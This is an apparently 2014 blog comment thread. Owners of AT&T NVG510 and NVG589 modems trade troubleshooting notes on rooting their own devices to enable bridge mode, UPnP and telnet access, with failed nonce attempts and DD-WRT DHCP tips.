I'd like to get the app just because it looks way easier. Do I need to install the backdoor before enabling uPnP and true bridged mode? Currently I'm using some complicated configuration with IP Passthrough that doesn't seem to really do what I need. Should I do a factory reset before using your app? Does the factory reset put the subnet back to 192.168.1.x? 
3/18/2014 8:04:49 PM
john
Sorry I also meant to ask where is the Wiki mentioned in the first comment in this thread?
3/18/2014 8:05:34 PM
john
I'm getting page cannot be displayed in both IE and FF trying to root the modem. How does your page know how to access the modem? Mine is not on the default IP and it's not listed on my PC as the gateway because I have a router behind the modem. 
3/19/2014 12:03:17 AM
Samizdata
Well, it didn't work quite as listed, but I have managed to enable UPnP and also get the redirect disabled.  Now, does anyone have a clue on how to properly reset the device list?  (Sorry, no Android device.)
3/19/2014 11:51:38 PM
JAW
Earlz, I don't know if you still monitor this page, but I figured I would give it a shot.  I have followed your instructions and I still can not get to the root.  Every time I put the nonce value in your page I get a invalid firmware message.  I have a NVG510 with •NVG510 9.0.6h2d30 firmware, Windows 7 (64 bit), IE 11 and I am connecting via CAT5 cable with no other devices connected to NVG 510.  Any suggestions?  I don't have access to an Android device otherwise I would do the $3.00 app.
4/2/2014 1:28:14 AM
Earlz
I am temporarily disabling comments due to spam. Until I get better spam blocking support, please email me at earlz -at- this domain (earlz dot net) with issues
4/10/2014 1:46:23 PM
ThaCrip
Shaun said... "That is what I did, but in my case the NVG-510 continues to pull the working public IP, and the DD-WRT router pulls a different, non-working, but public IP."

also, i noticed i got to generally go into the DD-WRT router and under it's "Status > WAN" section that you have to click the 'DHCP release' and then wait a few seconds and then click 'DHCP renew' and then the DD-WRT router should attempt to make a connection (it usually works pretty quickly in my case) as i have the 'Setup > Basic Setup' and under the 'WAN connection type' have that set to 'Automatic Configuration - DHCP' and i got the MTU set to 1500 (i am not sure if the MTU setting matters).

p.s. sorry for the nearly 3 month late reply.
4/30/2014 10:29:07 AM
KZ
First of all thank you for all the hard work to find this vulnerability and create this site. Kudos! I am a very unhappy AT&T customer who has for almost 6 months been trying to get my NVG589 into bridge mode. I have tried a variety of methods all suggested by different people on line. occasionally one will work for a couple of days and then quit again. I have never been able to replicate success so I thought I would give your hack a try. I have tried to use the hack locating the nonce value and plugging it into your control2 page script. I very quickly get a response from the RG on the update page saying "invalid firmware image". After rebooting the RG I am not able to access the CLI on port 28. I have tried a simple telnet from the CLI in windows 7 as well as putty both result in a connection failed.  I then took a look at the nonce value again and noticed that it changes with each reboot of the RG. I don't know if that is significant but I thought I would mention it.I have tried this several times with no 
5/2/2014 8:45:14 PM
Kenneth
Hey, I got into the router just fine, however it dumped me right to nsh as soon as I telnetted in, not sure if that is a problem or not. Secondly when ever I change mgmt.lan-redirect.enable to off and go to save it says the directory is dirty and wont let me save my changes. Any idea on how to change this?
5/9/2014 4:44:52 PM

Posting comments is currently disabled(probably due to spam)